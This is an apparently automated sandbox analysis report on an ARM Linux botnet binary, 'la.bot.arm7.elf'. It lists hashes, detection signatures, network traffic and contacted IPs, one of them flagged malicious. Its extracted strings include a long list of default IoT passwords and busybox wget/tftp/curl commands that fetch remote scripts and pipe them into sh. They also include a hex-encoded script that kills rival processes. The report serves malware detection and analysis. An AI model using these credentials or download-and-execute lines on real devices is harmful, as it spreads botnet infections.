Linux Analysis Report
la.bot.arm7.elf

Overview

General Information

Sample name: la.bot.arm7.elf
Analysis ID: 1541782
MD5: 6ae673996df45fab44f5bf83270dce61
SHA1: 3e82c078b32da1ac78773a7beb04945b5e1b0ff5
SHA256: 980c4e13676f249ad56ae436211a4590544667dc78adda0cc22b15318c81c160
Tags: elfuser-abuse_ch
Infos:

Detection

Score: 60
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: la.bot.arm7.elf Avira: detected
Multi AV Scanner detection for submitted file
Source: la.bot.arm7.elf ReversingLabs: Detection: 36%
Source: la.bot.arm7.elf Virustotal: Detection: 35% Perma Link
Found strings indicative of a multi-platform dropper
Source: la.bot.arm7.elf String: ash|login|wget|curl|tftp|ntpdate
Source: la.bot.arm7.elf String: ash|login|wget|curl|tftp|ntpdate|ftp
Source: la.bot.arm7.elf String: /proc//exe|ash|login|wget|curl|tftp|ntpdate/mountinfo/fd/dev/null|/dev/consolesocket|proc/usr/bin/usr/sbin/system/mnt/mtd/app/org/z/zbin/home/app/dvr/bin/duksan/userfs/mnt/app/usr/etc/dvr/main/usr/local/var/bin/tmp/sqfs/z/bin/dvr/mnt/mtd/zconf/gm/bin/home/process/var/challenge/usr/lib/lib/systemd//usr/lib/systemd/system/system/bin//mnt//home/helper/home/davinci/usr/libexec//sbin//bin//proc/net/tcp/proc/fd//proc/ash|login|wget|curl|tftp|ntpdate|ftp/maps/lib//proc/self/exe/dev/watchdog/dev/misc/watchdogtelnetd|udhcpc|ntpclient|boa|httpd|mini_http|watchdog|pppdM
Source: la.bot.arm7.elf String: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORA/bin/busybox echo > .ri && sh .ri && cd .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrepwEek/var//var/run//var/tmp//dev//dev/shm//etc//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63\x2F\x2A\3B""\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A\x20\x20\x23\x20\x53\x6B\x69\x70\x20\x6E\x6F\x6E\x2D""\x6E\x75\x6D\x65\x72\x69\x63\x20\x64\x69\x72\x65\x63\x74\x6F\x72\x69\x65\x73\x0A\x20\x20\x69\x66\x20\x21\x20\x5B\x20\x22\x24\x70\x69\x64\x22\x20\x2D\x65""\x71\x20\x22\x24\x70\x69\x64\x22\x20\x5D\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x63\x6F\x6E\x74""\x69\x6E\x75\x65\x0A\x20\x20\x66\x69\x0A\x0A\x20\x20\x23\x20\x47\x65\x74\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x6F\x66""\x20\x74\x68\x65\x20\x70\x72\x6F\x63\x65\x73\x73\x0A\x20\x20\x63\x6D\x64\x6C\x69\x6E\x65\x3D\x24\x28\x74\x72\x20\x27\x5C\x30\x27\x20\x27\x20\x27\x20\x3C""\x20\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x63\x6D\x64\x6C\x69\x6E\x65\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x23""\x20\x43\x68\x65\x63\x6B\x20\x69\x66\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x63\x6F\x6E\x74\x61\x69\x6E\x73\x20\x22\x64""\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x0A\x20\x20\x69\x66\x20\x65\x63\x68\x6F\x20\x22\x24\x63\x6D\x64\x6C\x69\x6E\x65\x22\x20\x7C\x20\x67\x72\x65\x70\x20\x2D""\x71\x20\x22\x64\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64""\x22\x0A\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4T

Networking
barindex
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 103.253.147.242 ports 23789,2,3,7,8,9
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.23:49340 -> 103.253.147.242:23789
Sample listens on a socket
Source: /tmp/la.bot.arm7.elf (PID: 6253) Socket: 127.0.0.1:1234 Jump to behavior
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Source: global traffic TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 103.253.147.242
Source: unknown TCP traffic detected without corresponding DNS query: 103.253.147.242
Source: unknown TCP traffic detected without corresponding DNS query: 103.253.147.242
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 103.253.147.242
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 103.253.147.242
Source: unknown TCP traffic detected without corresponding DNS query: 103.253.147.242
Source: unknown TCP traffic detected without corresponding DNS query: 103.253.147.242
Source: unknown TCP traffic detected without corresponding DNS query: 103.253.147.242
Source: unknown UDP traffic detected without corresponding DNS query: 116.203.104.203
Source: la.bot.arm7.elf String found in binary or memory: http:///curl.sh
Source: la.bot.arm7.elf String found in binary or memory: http:///wget.sh
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: usage: busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample String containing 'busybox' found: /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox hostname FICORA
Source: Initial sample String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample String containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
Source: Initial sample String containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep
Source: Initial sample String containing 'busybox' found: usage: busyboxincorrectinvalidbadwrongfaildeniederrorretryGET /dlr. HTTP/1.0
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne >> > upnp
Source: Initial sample String containing 'busybox' found: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORA/bin/busybox echo > .ri && sh .ri && cd .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrepwEek/var//var/run//var
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal60.troj.linELF@0/0@0/0
Enumerates processes within the "proc" file system
Source: /tmp/la.bot.arm7.elf (PID: 6253) File opened: /proc/11/maps Jump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 6253) File opened: /proc/22/maps Jump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 6253) File opened: /proc/66/maps Jump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 6253) File opened: /proc/99/maps Jump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 6253) File opened: /proc/111/maps Jump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 6253) File opened: /proc/222/maps Jump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 6253) File opened: /proc/333/maps Jump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 6253) File opened: /proc/777/maps Jump to behavior
Source: submitted sample Stderr: qemu: uncaught target signal 11 (Segmentation fault) - core dumpedqemu: uncaught target signal 11 (Segmentation fault) - core dumped: exit code = 0
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/la.bot.arm7.elf (PID: 6253) Queries kernel information via 'uname': Jump to behavior
Source: la.bot.arm7.elf, 6253.1.00007ffe223b7000.00007ffe223d8000.rw-.sdmp, la.bot.arm7.elf, 6275.1.00007ffe223b7000.00007ffe223d8000.rw-.sdmp, la.bot.arm7.elf, 6277.1.00007ffe223b7000.00007ffe223d8000.rw-.sdmp, la.bot.arm7.elf, 6286.1.00007ffe223b7000.00007ffe223d8000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/la.bot.arm7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/la.bot.arm7.elf
Source: la.bot.arm7.elf, 6253.1.0000555ffb0cb000.0000555ffb21a000.rw-.sdmp, la.bot.arm7.elf, 6275.1.0000555ffb0cb000.0000555ffb21a000.rw-.sdmp, la.bot.arm7.elf, 6277.1.0000555ffb0cb000.0000555ffb21a000.rw-.sdmp, la.bot.arm7.elf, 6286.1.0000555ffb0cb000.0000555ffb21a000.rw-.sdmp Binary or memory string: _U!/etc/qemu-binfmt/arm
Source: la.bot.arm7.elf, 6253.1.0000555ffb0cb000.0000555ffb21a000.rw-.sdmp, la.bot.arm7.elf, 6275.1.0000555ffb0cb000.0000555ffb21a000.rw-.sdmp, la.bot.arm7.elf, 6277.1.0000555ffb0cb000.0000555ffb21a000.rw-.sdmp, la.bot.arm7.elf, 6286.1.0000555ffb0cb000.0000555ffb21a000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: la.bot.arm7.elf, 6253.1.00007ffe223b7000.00007ffe223d8000.rw-.sdmp, la.bot.arm7.elf, 6275.1.00007ffe223b7000.00007ffe223d8000.rw-.sdmp, la.bot.arm7.elf, 6277.1.00007ffe223b7000.00007ffe223d8000.rw-.sdmp, la.bot.arm7.elf, 6286.1.00007ffe223b7000.00007ffe223d8000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm
Source: la.bot.arm7.elf, 6275.1.00007ffe223b7000.00007ffe223d8000.rw-.sdmp, la.bot.arm7.elf, 6277.1.00007ffe223b7000.00007ffe223d8000.rw-.sdmp, la.bot.arm7.elf, 6286.1.00007ffe223b7000.00007ffe223d8000.rw-.sdmp Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
103.253.147.242
 unknown Singapore
14061 DIGITALOCEAN-ASNUS true
109.202.202.202
 unknown Switzerland
13030 INIT7CH false
116.203.104.203
 unknown Germany
24940 HETZNER-ASDE false
91.189.91.43
 unknown United Kingdom
41231 CANONICAL-ASGB false
91.189.91.42
 unknown United Kingdom
41231 CANONICAL-ASGB false